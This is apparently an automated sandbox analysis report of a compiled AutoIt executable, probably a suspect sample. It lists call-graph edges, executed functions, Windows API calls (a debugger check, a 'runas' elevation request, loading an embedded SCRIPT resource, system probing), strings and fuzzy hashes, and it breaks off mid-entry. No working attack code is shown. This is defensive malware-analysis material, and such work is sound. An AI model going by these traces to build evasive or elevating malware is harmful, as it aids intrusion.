calls 102597->102969 102601 5048b2 Mailbox 102601->102595 102975 5166ec 59 API calls 2 library calls 102601->102975 102606 504928 102603->102606 102612 4c85c0 59 API calls 102603->102612 102604 4cfea4 102650 4d0179 Mailbox _memmove 102604->102650 102605 50486b 102607 4c9ea0 341 API calls 102605->102607 102606->102650 102984 5160ab 59 API calls Mailbox 102606->102984 102607->102615 102608->102584 102610 4e0db6 Mailbox 59 API calls 102655 4d0106 _memmove 102610->102655 102612->102606 102615->102588 102615->102595 102974 53a2d9 85 API calls Mailbox 102615->102974 102619->102584 102621 504a4d 102622 4c9ea0 341 API calls 102621->102622 102623 504a87 102622->102623 102623->102588 102971 529e4a 89 API calls 4 library calls 102630->102971 102631 504ab2 102987 529e4a 89 API calls 4 library calls 102631->102987 102633->102610 102636 4c9c90 Mailbox 59 API calls 102636->102655 102637 4c9d3c 60 API calls 102637->102650 102967 529e4a 89 API calls 4 library calls 102639->102967 102640 4e0db6 59 API calls Mailbox 102640->102650 102641 4d0398 102641->101494 102644->102588 102989 529e4a 89 API calls 4 library calls 102644->102989 102649 504a1c 102653 4e0db6 Mailbox 59 API calls 102649->102653 102650->102621 102650->102631 102650->102637 102650->102639 102650->102640 102650->102641 102650->102649 102965 4c8740 68 API calls __cinit 102650->102965 102966 4c8660 68 API calls 102650->102966 102985 525937 68 API calls 102650->102985 102986 4c89b3 69 API calls Mailbox 102650->102986 102653->102621 102655->102636 102655->102650 102656 4d0162 102655->102656 102656->101494 102657->101424 102658->101429 102659->101494 102660->101432 102661->101432 102662->101432 102663->101494 102664->101494 102665->101494 102666->101494 102667->101494 102669 4feda1 102668->102669 102670 4c82f2 102668->102670 102671 4fedb1 102669->102671 102992 5161a4 59 API calls 102669->102992 102672 4c8339 Mailbox 102670->102672 102674 4c831c 102670->102674 102675 4c85c0 59 API calls 102670->102675 102672->101494 102676 4c8322 102674->102676 102677 4c85c0 59 API calls 102674->102677 102675->102674 102676->102672 102678 4c9c90 Mailbox 59 API calls 102676->102678 102677->102676 102678->102672 102679->101479 102680->101479 102681->101479 102682->101479 102683->101479 102684->101479 102685->101479 102686->102534 102687->102534 102688->102534 102689->102534 102690->102534 102691->102534 102692->102549 102693->102534 102792 52445a GetFileAttributesW 102694->102792 102698 53cadd 130 API calls 102697->102698 102699 53df47 102698->102699 102699->102565 102701 4c7667 59 API calls 102700->102701 102702 52cbaf 102701->102702 102703 4c7667 59 API calls 102702->102703 102704 52cbb8 102703->102704 102705 52cbcc 102704->102705 102905 4c9b3c 59 API calls 102704->102905 102707 4c9837 84 API calls 102705->102707 102708 52cbe9 102707->102708 102709 52ccea 102708->102709 102710 52cc0b 102708->102710 102722 52cd1a Mailbox 102708->102722 102712 4c4ddd 136 API calls 102709->102712 102711 4c9837 84 API calls 102710->102711 102713 52cc17 102711->102713 102714 52ccfe 102712->102714 102715 4c8047 59 API calls 102713->102715 102716 52cd16 102714->102716 102718 4c4ddd 136 API calls 102714->102718 102716->102722 102718->102716 102722->102565 102781 4c9837 84 API calls 102780->102781 102782 534494 102781->102782 102783 4c6240 94 API calls 102782->102783 102784 5344a4 102783->102784 102785 4c9ea0 341 API calls 102784->102785 102786 5344c9 102784->102786 102785->102786 102788 5344cd 102786->102788 102948 4c9a98 59 API calls Mailbox 102786->102948 102788->102565 102789->102561 102790->102559 102791->102563 102793 523c3e 102792->102793 102794 524475 FindFirstFileW 102792->102794 102793->102565 102794->102793 102795 52448a FindClose 102794->102795 102795->102793 102905->102705 102948->102788 102950 4c818f 102949->102950 102953 4c81aa 102949->102953 102951 4c7e4f 59 API calls 102950->102951 102952 4c8197 CharUpperBuffW 102951->102952 102952->102953 102953->102579 102955 4cf251 102954->102955 102956 4cf272 102955->102956 102990 529e4a 89 API calls 4 library calls 102955->102990 102956->102584 102959 4c838d 102958->102959 102960 4fedbd 102958->102960 102961 4e0db6 Mailbox 59 API calls 102959->102961 102962 4c8394 102961->102962 102963 4c83b5 102962->102963 102991 4c8634 59 API calls Mailbox 102962->102991 102963->102596 102963->102604 102965->102650 102966->102650 102967->102580 102968->102588 102969->102590 102970->102588 102971->102588 102972->102591 102973->102605 102974->102601 102975->102601 102977 4c85ce 102976->102977 102983 4c85f6 102976->102983 102978 4c85dc 102977->102978 102979 4c85c0 59 API calls 102977->102979 102980 4c85e2 102978->102980 102981 4c85c0 59 API calls 102978->102981 102979->102978 102982 4c9c90 Mailbox 59 API calls 102980->102982 102980->102983 102981->102980 102982->102983 102983->102603 102984->102650 102985->102650 102986->102650 102987->102588 102989->102588 102990->102956 102991->102963 102992->102671 102994 4c7a85 _memmove 102993->102994 102995 4c7a5f 102993->102995 102994->101503 102994->102994 102995->102994 102996 4e0db6 Mailbox 59 API calls 102995->102996 102997 4c7ad4 102996->102997 102998 4e0db6 Mailbox 59 API calls 102997->102998 102998->102994 102999->101504 103000 4ffe27 103013 4df944 103000->103013 103002 4ffe3d 103003 4ffebe 103002->103003 103004 4ffe53 103002->103004 103009 4cfce0 341 API calls 103003->103009 103022 4c9e5d 60 API calls 103004->103022 103006 4ffe92 103007 4ffe9a 103006->103007 103008 50089c 103006->103008 103023 52834f 59 API calls Mailbox 103007->103023 103024 529e4a 89 API calls 4 library calls 103008->103024 103012 4ffeb2 Mailbox 103009->103012 103012->103012 103014 4df950 103013->103014 103015 4df962 103013->103015 103016 4c9d3c 60 API calls 103014->103016 103017 4df968 103015->103017 103018 4df991 103015->103018 103021 4df95a 103016->103021 103019 4e0db6 Mailbox 59 API calls 103017->103019 103020 4c9d3c 60 API calls 103018->103020 103019->103021 103020->103021 103021->103002 103022->103006 103023->103012 103024->103012 103025 4c1055 103030 4c2649 103025->103030 103028 4e2d40 __cinit 67 API calls 103029 4c1064 103028->103029 103031 4c7667 59 API calls 103030->103031 103032 4c26b7 103031->103032 103037 4c3582 103032->103037 103035 4c2754 103036 4c105a 103035->103036 103040 4c3416 59 API calls 2 library calls 103035->103040 103036->103028 103041 4c35b0 103037->103041 103040->103035 103042 4c35bd 103041->103042 103043 4c35a1 103041->103043 103042->103043 103044 4c35c4 RegOpenKeyExW 103042->103044 103043->103035 103044->103043 103045 4c35de RegQueryValueExW 103044->103045 103046 4c35ff 103045->103046 103047 4c3614 RegCloseKey 103045->103047 103046->103047 103047->103043 103048 4c1066 103053 4cf76f 103048->103053 103050 4c106c 103051 4e2d40 __cinit 67 API calls 103050->103051 103052 4c1076 103051->103052 103054 4cf790 103053->103054 103086 4dff03 103054->103086 103058 4cf7d7 103059 4c7667 59 API calls 103058->103059 103060 4cf7e1 103059->103060 103061 4c7667 59 API calls 103060->103061 103062 4cf7eb 103061->103062 103063 4c7667 59 API calls 103062->103063 103064 4cf7f5 103063->103064 103065 4c7667 59 API calls 103064->103065 103066 4cf833 103065->103066 103067 4c7667 59 API calls 103066->103067 103068 4cf8fe 103067->103068 103096 4d5f87 103068->103096 103072 4cf930 103073 4c7667 59 API calls 103072->103073 103074 4cf93a 103073->103074 103124 4dfd9e 103074->103124 103076 4cf981 103077 4cf991 GetStdHandle 103076->103077 103078 4cf9dd 103077->103078 103079 5045ab 103077->103079 103080 4cf9e5 OleInitialize 103078->103080 103079->103078 103081 5045b4 103079->103081 103080->103050 103131 526b38 64 API calls Mailbox 103081->103131 103083 5045bb 103132 527207 CreateThread 103083->103132 103085 5045c7 CloseHandle 103085->103080 103133 4dffdc 103086->103133 103089 4dffdc 59 API calls 103090 4dff45 103089->103090 103091 4c7667 59 API calls 103090->103091 103092 4dff51 103091->103092 103093 4c7bcc 59 API calls 103092->103093 103094 4cf796 103093->103094 103095 4e0162 6 API calls 103094->103095 103095->103058 103097 4c7667 59 API calls 103096->103097 103098 4d5f97 103097->103098 103099 4c7667 59 API calls 103098->103099 103100 4d5f9f 103099->103100 103140 4d5a9d 103100->103140 103103 4d5a9d 59 API calls 103104 4d5faf 103103->103104 103105 4c7667 59 API calls 103104->103105 103106 4d5fba 103105->103106 103107 4e0db6 Mailbox 59 API calls 103106->103107 103108 4cf908 103107->103108 103109 4d60f9 103108->103109 103110 4d6107 103109->103110 103111 4c7667 59 API calls 103110->103111 103112 4d6112 103111->103112 103113 4c7667 59 API calls 103112->103113 103114 4d611d 103113->103114 103115 4c7667 59 API calls 103114->103115 103116 4d6128 103115->103116 103117 4c7667 59 API calls 103116->103117 103118 4d6133 103117->103118 103119 4d5a9d 59 API calls 103118->103119 103120 4d613e 103119->103120 103121 4e0db6 Mailbox 59 API calls 103120->103121 103122 4d6145 RegisterWindowMessageW 103121->103122 103122->103072 103125 4dfdae 103124->103125 103126 51576f 103124->103126 103128 4e0db6 Mailbox 59 API calls 103125->103128 103143 529ae7 60 API calls 103126->103143 103129 4dfdb6 103128->103129 103129->103076 103130 51577a 103131->103083 103132->103085 103144 5271ed 65 API calls 103132->103144 103134 4c7667 59 API calls 103133->103134 103135 4dffe7 103134->103135 103136 4c7667 59 API calls 103135->103136 103137 4dffef 103136->103137 103138 4c7667 59 API calls 103137->103138 103139 4dff3b 103138->103139 103139->103089 103141 4c7667 59 API calls 103140->103141 103142 4d5aa5 103141->103142 103142->103103 103143->103130 103145 4c1016 103150 4c4974 103145->103150 103148 4e2d40 __cinit 67 API calls 103149 4c1025 103148->103149 103151 4e0db6 Mailbox 59 API calls 103150->103151 103152 4c497c 103151->103152 103153 4c101b 103152->103153 103157 4c4936 103152->103157 103153->103148 103158 4c493f 103157->103158 103159 4c4951 103157->103159 103160 4e2d40 __cinit 67 API calls 103158->103160 103161 4c49a0 103159->103161 103160->103159 103162 4c7667 59 API calls 103161->103162 103163 4c49b8 GetVersionExW 103162->103163 103164 4c7bcc 59 API calls 103163->103164 103165 4c49fb 103164->103165 103166 4c7d2c 59 API calls 103165->103166 103177 4c4a28 103165->103177 103167 4c4a1c 103166->103167 103168 4c7726 59 API calls 103167->103168 103168->103177 103169 4c4a93 GetCurrentProcess IsWow64Process 103170 4c4aac 103169->103170 103172 4c4b2b GetSystemInfo 103170->103172 103173 4c4ac2 103170->103173 103171 4fd864 103174 4c4af8 103172->103174 103185 4c4b37 103173->103185 103174->103153 103177->103169 103177->103171 103178 4c4b1f GetSystemInfo 103181 4c4ae9 103178->103181 103179 4c4ad4 103180 4c4b37 2 API calls 103179->103180 103182 4c4adc GetNativeSystemInfo 103180->103182 103181->103174 103183 4c4aef FreeLibrary 103181->103183 103182->103181 103183->103174 103186 4c4ad0 103185->103186 103187 4c4b40 LoadLibraryA 103185->103187 103186->103178 103186->103179 103187->103186 103188 4c4b51 GetProcAddress 103187->103188 103188->103186 103189 4c3633 103190 4c366a 103189->103190 103191 4c3688 103190->103191 103192 4c36e7 103190->103192 103228 4c36e5 103190->103228 103193 4c374b PostQuitMessage 103191->103193 103194 4c3695 103191->103194 103196 4c36ed 103192->103196 103197 4fd0cc 103192->103197 103201 4c36d8 103193->103201 103199 4fd154 103194->103199 103200 4c36a0 103194->103200 103195 4c36ca DefWindowProcW 103195->103201 103202 4c3715 SetTimer RegisterWindowMessageW 103196->103202 103203 4c36f2 103196->103203 103244 4d1070 10 API calls Mailbox 103197->103244 103249 522527 71 API calls _memset 103199->103249 103205 4c36a8 103200->103205 103206 4c3755 103200->103206 103202->103201 103207 4c373e CreatePopupMenu 103202->103207 103209 4fd06f 103203->103209 103210 4c36f9 KillTimer 103203->103210 103204 4fd0f3 103245 4d1093 341 API calls Mailbox 103204->103245 103212 4fd139 103205->103212 103213 4c36b3 103205->103213 103234 4c44a0 103206->103234 103207->103201 103216 4fd0a8 MoveWindow 103209->103216 103217 4fd074 103209->103217 103241 4c443a Shell_NotifyIconW _memset 103210->103241 103212->103195 103248 517c36 59 API calls Mailbox 103212->103248 103219 4c36be 103213->103219 103220 4fd124 103213->103220 103214 4fd166 103214->103195 103214->103201 103216->103201 103221 4fd078 103217->103221 103222 4fd097 SetFocus 103217->103222 103219->103195 103246 4c443a Shell_NotifyIconW _memset 103219->103246 103247 522d36 81 API calls _memset 103220->103247 103221->103219 103226 4fd081 103221->103226 103222->103201 103223 4c370c 103242 4c3114 DeleteObject DestroyWindow Mailbox 103223->103242 103243 4d1070 10 API calls Mailbox 103226->103243 103228->103195 103230 4fd134 103230->103201 103232 4fd118 103233 4c434a 68 API calls 103232->103233 103233->103228 103235 4c4539 103234->103235 103236 4c44b7 _memset 103234->103236 103235->103201 103237 4c407c 61 API calls 103236->103237 103239 4c44de 103237->103239 103238 4c4522 KillTimer SetTimer 103238->103235 103239->103238 103240 4fd4ab Shell_NotifyIconW 103239->103240 103240->103238 103241->103223 103242->103201 103243->103201 103244->103204 103245->103219 103246->103232 103247->103230 103248->103228 103249->103214 103250 50416f 103254 515fe6 103250->103254 103252 50417a 103253 515fe6 85 API calls 103252->103253 103253->103252 103256 515ff3 103254->103256 103264 516020 103254->103264 103255 516022 103266 4c9328 84 API calls Mailbox 103255->103266 103256->103255 103257 516027 103256->103257 103262 51601a 103256->103262 103256->103264 103259 4c9837 84 API calls 103257->103259 103260 51602e 103259->103260 103261 4c7b2e 59 API calls 103260->103261 103261->103264 103265 4c95a0 59 API calls _wcsstr 103262->103265 103264->103252 103265->103264 103266->103257 103267 528d0d 103268 528d20 103267->103268 103269 528d1a 103267->103269 103271 528d31 103268->103271 103272 4e2d55 _free 58 API calls 103268->103272 103270 4e2d55 _free 58 API calls 103269->103270 103270->103268 103273 4e2d55 _free 58 API calls 103271->103273 103274 528d43 103271->103274 103272->103271 103273->103274

                                                                                                                      Executed Functions

                                                                                                                      Function 004C3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C3B68
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004C3B7A
                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,005852F8,005852E0,?,?), ref: 004C3BEB
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                        • Part of subcall function 004D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,004C3C14,005852F8,?,?,?), ref: 004D096E
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004C3C6F
                                                                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00577770,00000010), ref: 004FD281
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,005852F8,?,?,?), ref: 004FD2B9
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00574260,005852F8,?,?,?), ref: 004FD33F
                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 004FD346
                                                                                                                        • Part of subcall function 004C3A46: GetSysColorBrush.USER32(0000000F), ref: 004C3A50
                                                                                                                        • Part of subcall function 004C3A46: LoadCursorW.USER32(00000000,00007F00), ref: 004C3A5F
                                                                                                                        • Part of subcall function 004C3A46: LoadIconW.USER32(00000063), ref: 004C3A76
                                                                                                                        • Part of subcall function 004C3A46: LoadIconW.USER32(000000A4), ref: 004C3A88
                                                                                                                        • Part of subcall function 004C3A46: LoadIconW.USER32(000000A2), ref: 004C3A9A
                                                                                                                        • Part of subcall function 004C3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004C3AC0
                                                                                                                        • Part of subcall function 004C3A46: RegisterClassExW.USER32(?), ref: 004C3B16
                                                                                                                        • Part of subcall function 004C39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004C3A03
                                                                                                                        • Part of subcall function 004C39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004C3A24
                                                                                                                        • Part of subcall function 004C39D5: ShowWindow.USER32(00000000,?,?), ref: 004C3A38
                                                                                                                        • Part of subcall function 004C39D5: ShowWindow.USER32(00000000,?,?), ref: 004C3A41
                                                                                                                        • Part of subcall function 004C434A: _memset.LIBCMT ref: 004C4370
                                                                                                                        • Part of subcall function 004C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004C4415
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%U
                                                                                                                      • API String ID: 529118366-3007341966
                                                                                                                      • Opcode ID: f5a3c550d88f38fa34f4caa0d28bf4cbc767fef296c8f1679847c458ad36c0ce
                                                                                                                      • Instruction ID: 0cdf3bb24a46bb51d5a3b330a771522bedb4372e82d94bde0c9830a62f0e2339
                                                                                                                      • Opcode Fuzzy Hash: f5a3c550d88f38fa34f4caa0d28bf4cbc767fef296c8f1679847c458ad36c0ce
                                                                                                                      • Instruction Fuzzy Hash: 9F51F63DD04108AACB50EFB5DC05FFE7B75AB55318F0080AFF85272262DA785609DB29
                                                                                                                      Function 004C49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1037 4c49a0-4c4a00 call 4c7667 GetVersionExW call 4c7bcc 1042 4c4b0b-4c4b0d 1037->1042 1043 4c4a06 1037->1043 1044 4fd767-4fd773 1042->1044 1045 4c4a09-4c4a0e 1043->1045 1046 4fd774-4fd778 1044->1046 1047 4c4a14 1045->1047 1048 4c4b12-4c4b13 1045->1048 1050 4fd77b-4fd787 1046->1050 1051 4fd77a 1046->1051 1049 4c4a15-4c4a4c call 4c7d2c call 4c7726 1047->1049 1048->1049 1059 4fd864-4fd867 1049->1059 1060 4c4a52-4c4a53 1049->1060 1050->1046 1053 4fd789-4fd78e 1050->1053 1051->1050 1053->1045 1055 4fd794-4fd79b 1053->1055 1055->1044 1057 4fd79d 1055->1057 1061 4fd7a2-4fd7a5 1057->1061 1062 4fd869 1059->1062 1063 4fd880-4fd884 1059->1063 1060->1061 1064 4c4a59-4c4a64 1060->1064 1065 4fd7ab-4fd7c9 1061->1065 1066 4c4a93-4c4aaa GetCurrentProcess IsWow64Process 1061->1066 1067 4fd86c 1062->1067 1071 4fd86f-4fd878 1063->1071 1072 4fd886-4fd88f 1063->1072 1068 4fd7ea-4fd7f0 1064->1068 1069 4c4a6a-4c4a6c 1064->1069 1065->1066 1070 4fd7cf-4fd7d5 1065->1070 1073 4c4aac 1066->1073 1074 4c4aaf-4c4ac0 1066->1074 1067->1071 1079 4fd7fa-4fd800 1068->1079 1080 4fd7f2-4fd7f5 1068->1080 1075 4fd805-4fd811 1069->1075 1076 4c4a72-4c4a75 1069->1076 1077 4fd7df-4fd7e5 1070->1077 1078 4fd7d7-4fd7da 1070->1078 1071->1063 1072->1067 1081 4fd891-4fd894 1072->1081 1073->1074 1082 4c4b2b-4c4b35 GetSystemInfo 1074->1082 1083 4c4ac2-4c4ad2 call 4c4b37 1074->1083 1087 4fd81b-4fd821 1075->1087 1088 4fd813-4fd816 1075->1088 1084 4c4a7b-4c4a8a 1076->1084 1085 4fd831-4fd834 1076->1085 1077->1066 1078->1066 1079->1066 1080->1066 1081->1071 1086 4c4af8-4c4b08 1082->1086 1094 4c4b1f-4c4b29 GetSystemInfo 1083->1094 1095 4c4ad4-4c4ae1 call 4c4b37 1083->1095 1092 4fd826-4fd82c 1084->1092 1093 4c4a90 1084->1093 1085->1066 1091 4fd83a-4fd84f 1085->1091 1087->1066 1088->1066 1096 4fd859-4fd85f 1091->1096 1097 4fd851-4fd854 1091->1097 1092->1066 1093->1066 1099 4c4ae9-4c4aed 1094->1099 1102 4c4b18-4c4b1d 1095->1102 1103 4c4ae3-4c4ae7 GetNativeSystemInfo 1095->1103 1096->1066 1097->1066 1099->1086 1101 4c4aef-4c4af2 FreeLibrary 1099->1101 1101->1086 1102->1103 1103->1099
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004C49CD
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      • GetCurrentProcess.KERNEL32(?,0054FAEC,00000000,00000000,?), ref: 004C4A9A
                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 004C4AA1
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 004C4AE7
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004C4AF2
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 004C4B23
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 004C4B2F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1986165174-0
                                                                                                                      • Opcode ID: 2cb3f24f7bcde931fec62efdae1e212df66593b961665999c3ff541d16a60fbf
                                                                                                                      • Instruction ID: 624e834d1b227bf1fa62a1fe8e8265c46c44c43b061bbab44602ce709fb05a69
                                                                                                                      • Opcode Fuzzy Hash: 2cb3f24f7bcde931fec62efdae1e212df66593b961665999c3ff541d16a60fbf
                                                                                                                      • Instruction Fuzzy Hash: 3291E7359897C4DAC771DBA885606ABBFF5AF7A300B08495FD0C743B01D229B908D75E
                                                                                                                      Function 004C4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1104 4c4e89-4c4ea1 CreateStreamOnHGlobal 1105 4c4ec1-4c4ec6 1104->1105 1106 4c4ea3-4c4eba FindResourceExW 1104->1106 1107 4fd933-4fd942 LoadResource 1106->1107 1108 4c4ec0 1106->1108 1107->1108 1109 4fd948-4fd956 SizeofResource 1107->1109 1108->1105 1109->1108 1110 4fd95c-4fd967 LockResource 1109->1110 1110->1108 1111 4fd96d-4fd98b 1110->1111 1111->1108
                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,004C4D8E,?,?,00000000,00000000), ref: 004C4E99
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004C4D8E,?,?,00000000,00000000), ref: 004C4EB0
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,004C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,004C4E2F), ref: 004FD937
                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,004C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,004C4E2F), ref: 004FD94C
                                                                                                                      • LockResource.KERNEL32(004C4D8E,?,?,004C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,004C4E2F,00000000), ref: 004FD95F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT
                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                      • Opcode ID: 9ca553b79484b3a9b7cd9b6f8537491f422c99320bf2c0227bd79f0eb89a0a52
                                                                                                                      • Instruction ID: a91176218a3fa88f23c580e89f513a37551fe0305e3018c4c7d009bc121ef706
                                                                                                                      • Opcode Fuzzy Hash: 9ca553b79484b3a9b7cd9b6f8537491f422c99320bf2c0227bd79f0eb89a0a52
                                                                                                                      • Instruction Fuzzy Hash: 27115E79240700BFD7218B69EC58F677BBAFBC5B15F10426DF50586250DBA1E8049664
                                                                                                                      Function 004CFCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: pbX$%U
                                                                                                                      • API String ID: 3964851224-3649209936
                                                                                                                      • Opcode ID: a8f026bf592068e6ae5d5b7e83faf04232a5889069d3444cc29d7f8e5ac1c832
                                                                                                                      • Instruction ID: 9f83816ddcefc2e9464ad8b6a8f5b12249b0b1553bd1f547e9ccc489ca2faec2
                                                                                                                      • Opcode Fuzzy Hash: a8f026bf592068e6ae5d5b7e83faf04232a5889069d3444cc29d7f8e5ac1c832
                                                                                                                      • Instruction Fuzzy Hash: 52929AB46083419FD720DF15C490B2BBBE1BF85304F14896EE98A8B392D779EC45CB96
                                                                                                                      Function 004CE6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DdX$DdX$DdX$DdX$Variable must be of type 'Object'.
                                                                                                                      • API String ID: 0-2831853225
                                                                                                                      • Opcode ID: 79b4cd4bfe8602805d18f7a55f6913079ee2cdbbbd14d16e8b8aac5d32298c64
                                                                                                                      • Instruction ID: 8a718e1814361260065a940c6f55482f754089a020c85c88d59d1d6d65d14afc
